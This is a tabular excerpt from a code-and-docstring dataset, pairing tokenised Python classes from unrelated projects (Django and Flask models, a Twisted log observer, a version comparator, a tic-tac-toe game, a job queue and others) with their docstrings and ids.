code
stringlengths 4
4.48k
| docstring
stringlengths 1
6.45k
| _id
stringlengths 24
24
|
---|---|---|
class UserAgent(base.UserAgent): <NEW_LINE> <INDENT> def __init__(self, device_object): <NEW_LINE> <INDENT> self.device_object = device_object <NEW_LINE> self.certainty = device_object.accuracy <NEW_LINE> <DEDENT> def getCertainty(self): <NEW_LINE> <INDENT> return self.certainty <NEW_LINE> <DEDENT> def getMatchedUserAgent(self): <NEW_LINE> <INDENT> return self.device_object.devua <NEW_LINE> <DEDENT> def get(self, name): <NEW_LINE> <INDENT> if name == "is_wireless_device": <NEW_LINE> <INDENT> return self.device_object.is_wireless_device <NEW_LINE> <DEDENT> if not self.device_object.is_wireless_device: <NEW_LINE> <INDENT> return None <NEW_LINE> <DEDENT> if name == "usableDisplayWidth": <NEW_LINE> <INDENT> return self.device_object.max_image_width <NEW_LINE> <DEDENT> elif name == "usableDisplayHeight": <NEW_LINE> <INDENT> return self.device_object.max_image_height <NEW_LINE> <DEDENT> elif name == "model": <NEW_LINE> <INDENT> return self.device_object.model_name <NEW_LINE> <DEDENT> elif name == "vendor": <NEW_LINE> <INDENT> return self.device_object.brand_name <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> return None | Wurfl record wrapper, abstracted in mobile.sniffer way.
| 625990863317a56b869bf306 |
class StatementOfAccountStart(ModelView): <NEW_LINE> <INDENT> __name__ = 'account.statement.of.account.start' <NEW_LINE> fiscalyear = fields.Many2One('account.fiscalyear', 'Fiscal Year', required=True) <NEW_LINE> account = fields.Many2One('account.account', 'Account', domain=[('kind', '!=', 'view')], required=True) <NEW_LINE> party = fields.Many2One('party.party', 'Party') <NEW_LINE> @staticmethod <NEW_LINE> def default_fiscalyear(): <NEW_LINE> <INDENT> FiscalYear = Pool().get('account.fiscalyear') <NEW_LINE> return FiscalYear.find(Transaction().context.get('company'), exception=False) <NEW_LINE> <DEDENT> @staticmethod <NEW_LINE> def default_account(): <NEW_LINE> <INDENT> model = Transaction().context.get('active_model') <NEW_LINE> if model == 'account.account': <NEW_LINE> <INDENT> return Transaction().context.get('active_id') <NEW_LINE> <DEDENT> return None <NEW_LINE> <DEDENT> @staticmethod <NEW_LINE> def default_party(): <NEW_LINE> <INDENT> model = Transaction().context.get('active_model') <NEW_LINE> if model == 'party.party': <NEW_LINE> <INDENT> return Transaction().context.get('active_id') <NEW_LINE> <DEDENT> return None | Statement of Account | 625990863617ad0b5ee07cd5 |
class ChangeItemsHandler(BaseHandler): <NEW_LINE> <INDENT> @check('login') <NEW_LINE> def GET(self): <NEW_LINE> <INDENT> return self.write(success({'items': config.ITEMS})) | 变更条款 | 625990867c178a314d78e9ac |
class ODict(collections.OrderedDict): <NEW_LINE> <INDENT> def __init__(self, pairs=[]): <NEW_LINE> <INDENT> if isinstance(pairs, dict): <NEW_LINE> <INDENT> raise Exception("ODict does not allow construction from a dict") <NEW_LINE> <DEDENT> super(ODict, self).__init__(pairs) <NEW_LINE> old_items = self.items <NEW_LINE> self.items = lambda: odict_items(old_items()) | A wrapper for OrderedDict that doesn't allow sorting of keys | 6259908644b2445a339b771e |
class JobQueue(object): <NEW_LINE> <INDENT> def __init__(self, name): <NEW_LINE> <INDENT> self.name = name <NEW_LINE> self._queue = {} <NEW_LINE> <DEDENT> def __repr__(self): <NEW_LINE> <INDENT> return "Queue:%s,%d jobs"%(self.name, len(self._queue)) <NEW_LINE> <DEDENT> def __getitem__(self, key): <NEW_LINE> <INDENT> return self._queue[key] <NEW_LINE> <DEDENT> def __iter__(self): <NEW_LINE> <INDENT> for job in self._queue: <NEW_LINE> <INDENT> yield job <NEW_LINE> <DEDENT> <DEDENT> def len(self): <NEW_LINE> <INDENT> return len(self._queue) <NEW_LINE> <DEDENT> def add(self, job): <NEW_LINE> <INDENT> self._queue[job.job_id] = job <NEW_LINE> <DEDENT> def queue(self): <NEW_LINE> <INDENT> return self._queue <NEW_LINE> <DEDENT> def populate(self, start_date, end_date, cmdline): <NEW_LINE> <INDENT> for day in Helper.date_range(start_date, end_date): <NEW_LINE> <INDENT> job_cmdline = Helper.format_cmd_line(cmdline, day) <NEW_LINE> yyyymmdd = day.strftime("%Y%m%d") <NEW_LINE> job = Job(yyyymmdd, job_cmdline) <NEW_LINE> self.add(job) | This object represents Queue of Job objects | 6259908663b5f9789fe86cee |
class ContBatchNorm3d(nn.modules.batchnorm._BatchNorm): <NEW_LINE> <INDENT> def _check_input_dim(self, input): <NEW_LINE> <INDENT> if input.dim() != 5: <NEW_LINE> <INDENT> raise ValueError('expected 5D input (got {}D input)' .format(input.dim())) <NEW_LINE> <DEDENT> <DEDENT> def forward(self, input): <NEW_LINE> <INDENT> self._check_input_dim(input) <NEW_LINE> print('Check is OK.') <NEW_LINE> return F.batch_norm( input, self.running_mean, self.running_var, self.weight, self.bias, True, self.momentum, self.eps) | Normalize the input and check if the convolution size matrix is 5*5.
For more info check documentation of torch.nn.BatchNorm1d . | 625990864527f215b58eb762 |
class ContactForm(FlaskForm): <NEW_LINE> <INDENT> mail_subject = StringField("Subject: ", validators=[Length(min=5, max=250)]) <NEW_LINE> mail_body = TextAreaField(validators=[DataRequired(), Length(min=5)]) <NEW_LINE> sent_by = StringField("Your Email: ", validators=[DataRequired(), Email()]) <NEW_LINE> submit = SubmitField("Send Email") | A Flask-WTF form to send me an email | 6259908626068e7796d4e4c8 |
class ExpasyGetter(Obo): <NEW_LINE> <INDENT> bioversions_key = ontology = PREFIX <NEW_LINE> typedefs = [has_member, has_molecular_function] <NEW_LINE> def iter_terms(self, force: bool = False) -> Iterable[Term]: <NEW_LINE> <INDENT> return get_terms(version=self._version_or_raise, force=force) | A getter for ExPASy Enzyme Classes. | 62599086bf627c535bcb3059 |
class PuzzleView(SubView): <NEW_LINE> <INDENT> def __init__(self, parent: View, frame: tk.Frame): <NEW_LINE> <INDENT> super().__init__(parent, frame) <NEW_LINE> self.clue = tk.StringVar(self.root) <NEW_LINE> self.clue_label = tk.Label(self.frame, textvariable=self.clue) <NEW_LINE> self.time = tk.StringVar(self.root) <NEW_LINE> self.time_label = tk.Label(self.frame, textvariable=self.time) <NEW_LINE> self.canvas = tk.Canvas(self.frame) <NEW_LINE> self.cells = None <NEW_LINE> self.load() <NEW_LINE> <DEDENT> def load(self, width=DEFAULT_PUZZLE_WIDTH, height=DEFAULT_PUZZLE_HEIGHT): <NEW_LINE> <INDENT> clue_style = dict(appearance.puzzle.clues) <NEW_LINE> self.clue_label.config(**clue_style) <NEW_LINE> self.clue_label.grid(row=0, sticky=tk.W) <NEW_LINE> time_style = dict(appearance.puzzle.time) <NEW_LINE> self.time_label.config(**time_style) <NEW_LINE> self.time_label.grid(row=0, padx=TINY_PAD+1, sticky=tk.E) <NEW_LINE> canvas_width = appearance.puzzle.cell.size*width + CANVAS_PAD <NEW_LINE> canvas_height = appearance.puzzle.cell.size*height + CANVAS_PAD <NEW_LINE> border_fill = appearance.puzzle.fg <NEW_LINE> self.canvas.config(width=canvas_width, height=canvas_height, highlightthickness=0) <NEW_LINE> self.canvas.grid(row=1, pady=PAD, padx=(CANVAS_PAD_LEFT, 0)) <NEW_LINE> box_width = canvas_width - CANVAS_PAD <NEW_LINE> box_height = canvas_height - CANVAS_PAD <NEW_LINE> self.canvas.create_rectangle(0, 0, box_width, box_height, outline=border_fill) | The puzzle group of the crossword application. | 625990864a966d76dd5f0a6c |
class _Basis(CombinatorialFreeModule, BindableClass): <NEW_LINE> <INDENT> def __init__(self, algebra, prefix=None): <NEW_LINE> <INDENT> if prefix is None: <NEW_LINE> <INDENT> self._prefix = self._basis_name <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> self._prefix = prefix <NEW_LINE> <DEDENT> CombinatorialFreeModule.__init__(self, algebra.base_ring(), algebra._W, category=algebra._BasesCategory(), sorting_key=sorting_key, prefix=self._prefix) <NEW_LINE> <DEDENT> _basis_name = None <NEW_LINE> def _repr_term(self, t): <NEW_LINE> <INDENT> redword = t.reduced_word() <NEW_LINE> if len(redword) == 0: <NEW_LINE> <INDENT> return "1" <NEW_LINE> <DEDENT> return self._print_options['prefix'] + '[%s]'%','.join('%d'%i for i in redword) <NEW_LINE> <DEDENT> def _latex_term(self, t): <NEW_LINE> <INDENT> redword = t.reduced_word() <NEW_LINE> if len(redword) == 0: <NEW_LINE> <INDENT> return '1' <NEW_LINE> <DEDENT> return ''.join("%s_{%d}"%(self._print_options['prefix'], i) for i in redword) <NEW_LINE> <DEDENT> def product_on_basis(self, w1, w2): <NEW_LINE> <INDENT> return self(self.to_T_basis(w1) * self.to_T_basis(w2)) | Technical methods (i.e., not mathematical) that are inherited by each
basis of the algebra. These methods cannot be defined in the category. | 6259908650812a4eaa621988 |
class Invoice(SerializableModel): <NEW_LINE> <INDENT> customer = db.ReferenceProperty(Customer, collection_name='invoices') <NEW_LINE> total_price = DecimalProperty() <NEW_LINE> currency = db.StringProperty(choices=CURRENCY_CHOICES, default=DEFAULT_CURRENCY) <NEW_LINE> status = db.StringProperty(choices=INVOICE_STATUS_CHOICES, default=INVOICE_STATUS_DRAFT) <NEW_LINE> status_reason = db.StringProperty() | Maintains invoice information for orders placed by customers.
Helps answer these questions:
1. What was the total price of the invoice?
2. Who was the customer?
3. What currency was used for invoicing?
4. What was ordered by the customer?
5. When was the invoice generated?
6. How many and which transactions were used to satisfy payment for this invoice? | 6259908697e22403b383ca7e |
class Link(DatetimeModel, NullableGenericModel, AuthorableModel, IconModel, WeightedModel, UUID64Model): <NEW_LINE> <INDENT> TYPES = ((0, _("Text")), (1, _("Icon")), (2, _("Icon and text")), (3, _("oEmbed")), (4, _("Flash"))) <NEW_LINE> group = models.CharField(max_length=16, blank=True, db_index=True, verbose_name=_("Group"), help_text=_("Use the same name to group icons.")) <NEW_LINE> display = models.SmallIntegerField(choices=TYPES, default=0, db_index=True, help_text=_("Default display mode of this link"), verbose_name=_("Type")) <NEW_LINE> url = models.URLField(max_length=255, unique=True, verbose_name=_("URL")) <NEW_LINE> anchor = models.CharField(max_length=192, blank=True, verbose_name=_("Anchor")) <NEW_LINE> title = models.CharField(max_length=128, blank=True, verbose_name=_("Title")) <NEW_LINE> target = models.CharField(max_length=16, default="_self", blank=True, verbose_name=_("Target")) <NEW_LINE> nofollow = models.BooleanField(default=True, verbose_name=_("No-follow")) <NEW_LINE> remainder = models.CharField(max_length=64, blank=True, verbose_name=_("HTML Remainder"), help_text=_("HTML code of extra tag attributes")) <NEW_LINE> information = models.TextField(blank=True, default="", help_text=_("Internal information for the link"), verbose_name=_("Information")) <NEW_LINE> description = models.TextField(blank=True, default="", verbose_name=_("Description")) <NEW_LINE> objects = LinkManager() <NEW_LINE> def html(self, display=None): <NEW_LINE> <INDENT> display = display if display is not None else self.display <NEW_LINE> return render_to_string("content/display/link/link.html", {'item': self, display: display}) <NEW_LINE> <DEDENT> @addattr(boolean=True) <NEW_LINE> def is_valid(self): <NEW_LINE> <INDENT> parsed = parse.urlparse(self.url) <NEW_LINE> try: <NEW_LINE> <INDENT> URLValidator(self.url) <NEW_LINE> <DEDENT> except ValidationError: <NEW_LINE> <INDENT> return False <NEW_LINE> <DEDENT> return parsed.scheme in ['http', 'https', ''] and parsed.netloc != '' <NEW_LINE> <DEDENT> @addattr(boolean=True) <NEW_LINE> def exists(self): <NEW_LINE> <INDENT> try: <NEW_LINE> <INDENT> if self.is_valid(): <NEW_LINE> <INDENT> get_url_resource(self.url) <NEW_LINE> return True <NEW_LINE> <DEDENT> return False <NEW_LINE> <DEDENT> except URLError: <NEW_LINE> <INDENT> return False <NEW_LINE> <DEDENT> <DEDENT> def get_oembed(self): <NEW_LINE> <INDENT> from micawber import parsers <NEW_LINE> result = parsers.extract(self.url, bootstrap_oembed) <NEW_LINE> return result[1][self.url] <NEW_LINE> <DEDENT> def __str__(self): <NEW_LINE> <INDENT> return self.url <NEW_LINE> <DEDENT> class Meta: <NEW_LINE> <INDENT> verbose_name = _("link") <NEW_LINE> verbose_name_plural = _("links") <NEW_LINE> app_label = 'content' | Lien interne ou externe | 625990867047854f46340f3b |
@dataclass <NEW_LINE> class JobAssignment(object): <NEW_LINE> <INDENT> job: Job <NEW_LINE> assignee: Optional[scroll_util.Brother] <NEW_LINE> signer: Optional[scroll_util.Brother] <NEW_LINE> late: bool <NEW_LINE> bonus: bool <NEW_LINE> def to_raw(self) -> Tuple[str, str, str, str, str, str, str]: <NEW_LINE> <INDENT> signer_name = self.signer.name if self.signer is not None else SIGNOFF_PLACEHOLDER <NEW_LINE> late = "y" if self.late else "n" <NEW_LINE> bonus = "y" if self.bonus else "n" <NEW_LINE> assignee = self.assignee.name if self.assignee else NOT_ASSIGNED <NEW_LINE> return self.job.name, self.job.house, self.job.day_of_week, assignee, signer_name, late, bonus | Tracks a job's assignment and completion | 62599086283ffb24f3cf5427 |
class Solution: <NEW_LINE> <INDENT> def productExceptSelf(self, nums: List[int]) -> List[int]: <NEW_LINE> <INDENT> result = [1] * len(nums) <NEW_LINE> for i in range(1, len(nums)): <NEW_LINE> <INDENT> result[i] = nums[i-1] * result[i-1] <NEW_LINE> <DEDENT> right_prod = 1 <NEW_LINE> for i in range(len(nums)-1, -1, -1): <NEW_LINE> <INDENT> result[i] *= right_prod <NEW_LINE> right_prod *= nums[i] <NEW_LINE> <DEDENT> return result | Time complexity: O(n)
Space complexity: O(1) - output array does not count as extra space as per problem description. | 62599086f9cc0f698b1c608f |
class FileLogObserver(_GlobalStartStopMixIn): <NEW_LINE> <INDENT> timeFormat = None <NEW_LINE> def __init__(self, f): <NEW_LINE> <INDENT> self.write = f.write <NEW_LINE> self.flush = f.flush <NEW_LINE> <DEDENT> def getTimezoneOffset(self, when): <NEW_LINE> <INDENT> offset = datetime.utcfromtimestamp(when) - datetime.fromtimestamp(when) <NEW_LINE> return offset.days * (60 * 60 * 24) + offset.seconds <NEW_LINE> <DEDENT> def formatTime(self, when): <NEW_LINE> <INDENT> if self.timeFormat is not None: <NEW_LINE> <INDENT> return datetime.fromtimestamp(when).strftime(self.timeFormat) <NEW_LINE> <DEDENT> tzOffset = -self.getTimezoneOffset(when) <NEW_LINE> when = datetime.utcfromtimestamp(when + tzOffset) <NEW_LINE> tzHour = abs(int(tzOffset / 60 / 60)) <NEW_LINE> tzMin = abs(int(tzOffset / 60 % 60)) <NEW_LINE> if tzOffset < 0: <NEW_LINE> <INDENT> tzSign = '-' <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> tzSign = '+' <NEW_LINE> <DEDENT> return '%d-%02d-%02d %02d:%02d:%02d%s%02d%02d' % ( when.year, when.month, when.day, when.hour, when.minute, when.second, tzSign, tzHour, tzMin) <NEW_LINE> <DEDENT> def emit(self, eventDict): <NEW_LINE> <INDENT> text = textFromEventDict(eventDict) <NEW_LINE> if text is None: <NEW_LINE> <INDENT> return <NEW_LINE> <DEDENT> timeStr = self.formatTime(eventDict["time"]) <NEW_LINE> fmtDict = { "system": eventDict["system"], "text": text.replace("\n", "\n\t") } <NEW_LINE> msgStr = _safeFormat("[%(system)s] %(text)s\n", fmtDict) <NEW_LINE> util.untilConcludes(self.write, timeStr + " " + msgStr) <NEW_LINE> util.untilConcludes(self.flush) | Log observer that writes to a file-like object.
@type timeFormat: C{str} or C{NoneType}
@ivar timeFormat: If not C{None}, the format string passed to strftime(). | 625990867cff6e4e811b75ca |
class TaskThread(): <NEW_LINE> <INDENT> def __init__(self,tid): <NEW_LINE> <INDENT> self.tid = tid <NEW_LINE> <DEDENT> def run_tasks(self,tid): <NEW_LINE> <INDENT> task_obj = TestTask.objects.get(id=tid) <NEW_LINE> case_list = task_obj.cases.split(",") <NEW_LINE> case_list.pop(-1) <NEW_LINE> task_obj.status=1 <NEW_LINE> task_obj.save() <NEW_LINE> cases_all = {} <NEW_LINE> for case_id in case_list: <NEW_LINE> <INDENT> print(case_id) <NEW_LINE> cases_obj = TestCase.objects.get(pk=case_id) <NEW_LINE> case_dict = { "url": cases_obj.url, "req_methed": cases_obj.req_methed, "req_type": cases_obj.req_type, "req_header": cases_obj.req_header, "req_para": cases_obj.req_para, "response_assert": cases_obj.response_assert } <NEW_LINE> cases_all[cases_obj.id] = case_dict <NEW_LINE> <DEDENT> json_str = json.dumps(cases_all) <NEW_LINE> case_data_file = TASK_PATH + "cases_data.json" <NEW_LINE> with open(case_data_file, "w+") as f: <NEW_LINE> <INDENT> f.write(json_str) <NEW_LINE> <DEDENT> os.system("python3 " + RUN_TASK_FILE) <NEW_LINE> <DEDENT> def run(self): <NEW_LINE> <INDENT> threads = [] <NEW_LINE> t = threading.Thread(target=self.run_tasks,args=(self.tid,)) <NEW_LINE> threads.append(t) <NEW_LINE> for i in threads: <NEW_LINE> <INDENT> i.start() <NEW_LINE> <DEDENT> for i in threads: <NEW_LINE> <INDENT> i.join() <NEW_LINE> <DEDENT> sleep(2) <NEW_LINE> self.save_result() <NEW_LINE> task_obj = TestTask.objects.get(id=self.tid) <NEW_LINE> task_obj.status = 2 <NEW_LINE> task_obj.save() <NEW_LINE> <DEDENT> def run_new(self): <NEW_LINE> <INDENT> threads = [] <NEW_LINE> t = threading.Thread(target=self.run) <NEW_LINE> threads.append(t) <NEW_LINE> for i in threads: <NEW_LINE> <INDENT> i.start() <NEW_LINE> <DEDENT> <DEDENT> def save_result(self): <NEW_LINE> <INDENT> dom = minidom.parse(TASK_PATH +"results.xml") <NEW_LINE> root = dom.documentElement <NEW_LINE> ts = root.getElementsByTagName("testsuite") <NEW_LINE> name = ts[0].getAttribute("name") <NEW_LINE> errors = ts[0].getAttribute("errors") <NEW_LINE> failures = ts[0].getAttribute("failures") <NEW_LINE> skipped = ts[0].getAttribute("skipped") <NEW_LINE> tests = ts[0].getAttribute("tests") <NEW_LINE> run_time = ts[0].getAttribute("time") <NEW_LINE> with open((TASK_PATH +"results.xml"),"r",encoding="utf-8") as file: <NEW_LINE> <INDENT> result = file.read() <NEW_LINE> <DEDENT> TestResult.objects.create(name=name,errors=errors, failures=failures,skipped=skipped, tests=tests,run_time=run_time, task_id = self.tid,result=result) | '实现测试任务的多线程 | 625990867c178a314d78e9ae |
class Rating(models.Model): <NEW_LINE> <INDENT> Source = models.CharField(max_length=100) <NEW_LINE> Value = models.CharField(max_length=100) <NEW_LINE> movie_detail = models.ForeignKey(MovieDetail, on_delete=models.CASCADE, related_name="Ratings") <NEW_LINE> def __str__(self): <NEW_LINE> <INDENT> return f'Ratings from {self.Source} for {self.movie_detail})' | Stores movie ratings and is related to Movie detail model | 6259908660cbc95b06365b30 |
class Robot: <NEW_LINE> <INDENT> population = 0 <NEW_LINE> def __init__(self, name): <NEW_LINE> <INDENT> self.name = name <NEW_LINE> print('(Инициализация {0})'.format(self.name)) <NEW_LINE> Robot.population += 1 <NEW_LINE> <DEDENT> def __del__(self): <NEW_LINE> <INDENT> print('{0} уничтожается!'.format(self.name)) <NEW_LINE> Robot.population -= 1 <NEW_LINE> if Robot.population == 0: <NEW_LINE> <INDENT> print('{0} был последним.'.format(self.name)) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> print('Осталось {0:d} работающих роботов.'.format(Robot.population)) <NEW_LINE> <DEDENT> <DEDENT> def sayHi(self): <NEW_LINE> <INDENT> print('Приветствую! Мои хозяева называют меня {0}.'.format(self.name)) <NEW_LINE> <DEDENT> @staticmethod <NEW_LINE> def howMany(): <NEW_LINE> <INDENT> print('У нас {0:d} роботов.'.format(Robot.population)) | 'Представляет робота с именем. | 625990863317a56b869bf309 |
class Version(object): <NEW_LINE> <INDENT> def __init__(self, version, rel_type=None): <NEW_LINE> <INDENT> self._parts = [int(part) for part in version.split(".")] <NEW_LINE> self._str = version <NEW_LINE> self._type = rel_type <NEW_LINE> <DEDENT> def __repr__(self): <NEW_LINE> <INDENT> return str(self._parts) <NEW_LINE> <DEDENT> def __str__(self): <NEW_LINE> <INDENT> return self._str <NEW_LINE> <DEDENT> def __eq__(self, other): <NEW_LINE> <INDENT> ver1 = self._parts <NEW_LINE> ver2 = other._parts <NEW_LINE> return ver1 == ver2 <NEW_LINE> <DEDENT> def __ne__(self, other): <NEW_LINE> <INDENT> ver1 = self._parts <NEW_LINE> ver2 = other._parts <NEW_LINE> return ver1 != ver2 <NEW_LINE> <DEDENT> def __gt__(self, other): <NEW_LINE> <INDENT> ver1 = self._parts <NEW_LINE> ver2 = other._parts <NEW_LINE> for pair in zip(ver1, ver2): <NEW_LINE> <INDENT> if pair[0] > pair[1]: <NEW_LINE> <INDENT> return True <NEW_LINE> <DEDENT> elif pair[0] < pair[1]: <NEW_LINE> <INDENT> return False <NEW_LINE> <DEDENT> <DEDENT> if len(ver1) > len(ver2): <NEW_LINE> <INDENT> return True <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> return False <NEW_LINE> <DEDENT> <DEDENT> def __lt__(self, other): <NEW_LINE> <INDENT> ver1 = self._parts <NEW_LINE> ver2 = other._parts <NEW_LINE> for pair in zip(ver1, ver2): <NEW_LINE> <INDENT> if pair[0] < pair[1]: <NEW_LINE> <INDENT> return True <NEW_LINE> <DEDENT> elif pair[0] > pair[1]: <NEW_LINE> <INDENT> return False <NEW_LINE> <DEDENT> <DEDENT> if len(ver1) < len(ver2): <NEW_LINE> <INDENT> return True <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> return False <NEW_LINE> <DEDENT> <DEDENT> def __ge__(self, other): <NEW_LINE> <INDENT> ver1 = self._parts <NEW_LINE> ver2 = other._parts <NEW_LINE> for pair in zip(ver1, ver2): <NEW_LINE> <INDENT> if pair[0] > pair[1]: <NEW_LINE> <INDENT> return True <NEW_LINE> <DEDENT> elif pair[0] < pair[1]: <NEW_LINE> <INDENT> return False <NEW_LINE> <DEDENT> <DEDENT> if len(ver1) >= len(ver2): <NEW_LINE> <INDENT> return True <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> return False <NEW_LINE> <DEDENT> <DEDENT> def __le__(self, other): <NEW_LINE> <INDENT> ver1 = self._parts <NEW_LINE> ver2 = other._parts <NEW_LINE> for pair in zip(ver1, ver2): <NEW_LINE> <INDENT> if pair[0] < pair[1]: <NEW_LINE> <INDENT> return True <NEW_LINE> <DEDENT> elif pair[0] > pair[1]: <NEW_LINE> <INDENT> return False <NEW_LINE> <DEDENT> <DEDENT> if len(ver1) <= len(ver2): <NEW_LINE> <INDENT> return True <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> return False <NEW_LINE> <DEDENT> <DEDENT> @property <NEW_LINE> def decorated(self): <NEW_LINE> <INDENT> if self._type is not None: <NEW_LINE> <INDENT> return self._str + " ({})".format(self._type) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> return self._str | Version control object.
Creates multi-part version number functionality.
Using str(instance) returns a string containing dot separated numbers.
Args:
version (str): Dot separated integer string (e.g. "1.0.2")
rel_type (str): Release type (e.g. "beta", "stable", etc.).
Used to generate decorated string, for display purposes.
Attributes:
decorated (str): Decorated string, in format "<dot separated version number> (<rel_type>)" (e.g. "1.0.2 (stable)"). | 62599086aad79263cf430345 |
class MyPickleableObject(tf.__internal__.tracking.AutoTrackable): <NEW_LINE> <INDENT> @property <NEW_LINE> @layer_utils.cached_per_instance <NEW_LINE> def my_id(self): <NEW_LINE> <INDENT> _PICKLEABLE_CALL_COUNT[self] += 1 <NEW_LINE> return id(self) | Needed for InterfaceTests.test_property_cache_serialization.
This class must be at the top level. This is a constraint of pickle,
unrelated to `cached_per_instance`. | 62599087f9cc0f698b1c6091 |
class name(baseMODS): <NEW_LINE> <INDENT> affiliations = models.ListField(affiliation) <NEW_LINE> altRepGroup = models.Attribute() <NEW_LINE> authority = models.Attribute() <NEW_LINE> authorityURI = models.Attribute() <NEW_LINE> descriptions = models.ListField(description) <NEW_LINE> displayForms = models.ListField(displayForm) <NEW_LINE> displayLabel = models.Attribute() <NEW_LINE> mods_ID = models.Attribute() <NEW_LINE> mods_type = models.Attribute() <NEW_LINE> nameParts = models.ListField(namePart) <NEW_LINE> nameTitleGroup = models.Attribute() <NEW_LINE> roles = models.ListField(role) <NEW_LINE> usage = models.Attribute() <NEW_LINE> valueURI = models.Attribute() <NEW_LINE> xlink = models.Attribute() <NEW_LINE> def load_xml(self, name_element): <NEW_LINE> <INDENT> set_attributes(name_element,self) <NEW_LINE> affiliation_elements = name_element.findall('{%s}affiliation' % ns.MODS) <NEW_LINE> for element in affiliation_elements: <NEW_LINE> <INDENT> new_affiliation = affiliation() <NEW_LINE> affiliation.load_xml(element) <NEW_LINE> self.affiliations.append(affiliation) <NEW_LINE> <DEDENT> description_elements = name_element.findall('{%s}description' % ns.MODS) <NEW_LINE> for element in description_elements: <NEW_LINE> <INDENT> new_description = description() <NEW_LINE> new_description.load_xml(element) <NEW_LINE> self.descriptions.append(new_description) <NEW_LINE> <DEDENT> display_form_elements = name_element.findall('{%s}displayForm' % ns.MODS) <NEW_LINE> for element in display_form_elements: <NEW_LINE> <INDENT> new_display_form = displayForm() <NEW_LINE> new_display_form.load_xml(element) <NEW_LINE> self.displayForms.append(new_display_form) <NEW_LINE> <DEDENT> name_part_elements = name_element.findall('{%s}namePart' % ns.MODS) <NEW_LINE> for element in name_part_elements: <NEW_LINE> <INDENT> new_name_part = namePart() <NEW_LINE> new_name_part.load_xml(element) <NEW_LINE> self.nameParts.append(new_name_part) <NEW_LINE> <DEDENT> role_elements = name_element.findall('{%s}role' % ns.MODS) <NEW_LINE> for element in role_elements: <NEW_LINE> <INDENT> new_role = role() <NEW_LINE> new_role.load_xml(element) <NEW_LINE> self.roles.append(new_role) <NEW_LINE> <DEDENT> self.save() | name MODS element in Redis datastore | 62599087a8370b77170f1f58 |
class EventletServer(ServerAdapter): <NEW_LINE> <INDENT> def run(self, handler): <NEW_LINE> <INDENT> from eventlet import wsgi, listen <NEW_LINE> try: <NEW_LINE> <INDENT> wsgi.server(listen((self.host, self.port)), handler, log_output=(not self.quiet)) <NEW_LINE> <DEDENT> except TypeError: <NEW_LINE> <INDENT> wsgi.server(listen((self.host, self.port)), handler) | Untested | 62599087bf627c535bcb305f |
class TicTacToe( TwoPlayersGame ): <NEW_LINE> <INDENT> def __init__(self, players): <NEW_LINE> <INDENT> self.players = players <NEW_LINE> self.board = [0 for i in range(9)] <NEW_LINE> self.nplayer = 1 <NEW_LINE> <DEDENT> def possible_moves(self): <NEW_LINE> <INDENT> return [i+1 for i,e in enumerate(self.board) if e==0] <NEW_LINE> <DEDENT> def make_move(self, move): <NEW_LINE> <INDENT> self.board[move-1] = self.nplayer <NEW_LINE> <DEDENT> def unmake_move(self, move): <NEW_LINE> <INDENT> self.board[move-1] = 0 <NEW_LINE> <DEDENT> def lose(self): <NEW_LINE> <INDENT> return any( [all([(self.board[c-1]== self.nopponent) for c in line]) for line in [[1,2,3],[4,5,6],[7,8,9], [1,4,7],[2,5,8],[3,6,9], [1,5,9],[3,5,7]]]) <NEW_LINE> <DEDENT> def is_over(self): <NEW_LINE> <INDENT> return (self.possible_moves() == []) or self.lose() <NEW_LINE> <DEDENT> def show(self): <NEW_LINE> <INDENT> print ('\n'+'\n'.join([ ' '.join([['.','O','X'][self.board[3*j+i]] for i in range(3)]) for j in range(3)]) ) <NEW_LINE> <DEDENT> def scoring(self): <NEW_LINE> <INDENT> return -100 if self.lose() else 0 | The board positions are numbered as follows:
7 8 9
4 5 6
1 2 3 | 62599087656771135c48adf6 |
class Node: <NEW_LINE> <INDENT> def __init__(self, name): <NEW_LINE> <INDENT> self.name = name <NEW_LINE> self.edges = dict() <NEW_LINE> self.edgeset = set() <NEW_LINE> <DEDENT> def __iter__(self): <NEW_LINE> <INDENT> return iter(self.edges.values()) <NEW_LINE> <DEDENT> def __str__(self): <NEW_LINE> <INDENT> return str(self.name) <NEW_LINE> <DEDENT> def add_edge(self, edge): <NEW_LINE> <INDENT> self.edges[edge.kwd] = edge <NEW_LINE> self.edgeset.add(edge.kwd) <NEW_LINE> <DEDENT> def select_edge(self, kwdset, partial=False, count=0): <NEW_LINE> <INDENT> match = self.edgeset & kwdset <NEW_LINE> if len(match) > 1: <NEW_LINE> <INDENT> log.info(f'Found match of {match}') <NEW_LINE> raise ValueError('Ambiguous...Too many edges match. ' 'Check for problems with graph table.') <NEW_LINE> <DEDENT> elif len(match) == 1: <NEW_LINE> <INDENT> ans = self.edges[match.pop()] <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> if 'default' in self.edges: <NEW_LINE> <INDENT> if not partial or (partial and count < len(kwdset)): <NEW_LINE> <INDENT> ans = self.edges['default'] <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> ans = Edge('default', [None, None, None, None], None) <NEW_LINE> <DEDENT> <DEDENT> else: <NEW_LINE> <INDENT> log.info('No match... Multiple edges but no default.') <NEW_LINE> ans = Edge('default', [None, None, None, None], None) <NEW_LINE> <DEDENT> <DEDENT> return ans | A Node correspondes to a graph table 'innode'.
Nodes are attached to each other by Edges. | 62599087283ffb24f3cf542c |
